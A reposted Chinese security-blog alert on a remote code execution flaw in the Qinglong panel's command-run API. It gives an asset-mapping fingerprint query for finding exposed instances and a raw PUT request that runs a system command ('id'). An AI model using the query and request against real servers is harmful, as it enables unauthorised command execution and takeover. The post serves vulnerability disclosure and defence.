文章总结： 本文档介绍了青龙面板网站管理系统command-run接口的远程代码执行漏洞。该漏洞源于在线执行命令功能存在鉴权或过滤缺陷，攻击者构造特定PUT请求即可执行任意系统命令。文章提供了FOFA资产测绘语法及详细的HTTP请求复现步骤，具有较高的实战价值。建议受影响用户立即排查并限制相关接口访问权限，以防范服务器被控风险。 综合评分： 78 文章分类： 漏洞预警,漏洞POC,渗透测试

【1day】青龙面板 网站管理系统 command-run 远程代码执行漏洞

原创

PocketSec PocketSec

PocketSec

2026年3月4日 11:47 四川

使用说明：本文章仅用于学习技术研究，请勿用于违法用途，造成任何后果自负与本人无关，请自觉遵守国家法律法规。

一、漏洞简介

青龙面板是一款基于 Web 的自动化任务管理与网站资源管理工具，主要用于：

• 定时任务调度
• 脚本执行管理
• 容器环境运维
• 自动化部署与运行维护

由于其核心功能包含“在线执行命令”，若接口鉴权或参数过滤存在缺陷，则可能导致远程代码执行（RCE）风险。

本次漏洞出现在 command-run功能模块

二、资产测绘

fofa:icon_hash=="-254502902"

三、漏洞复现

PUT /API/system/command-run HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Length: 17Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: closeContent-Type: application/jsonDnt: 1Upgrade-Insecure-Requests: 1{"command": "id"}

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：PocketSec PocketSec PocketSec《【1day】青龙面板 网站管理系统 command-run 远程代码执行漏洞》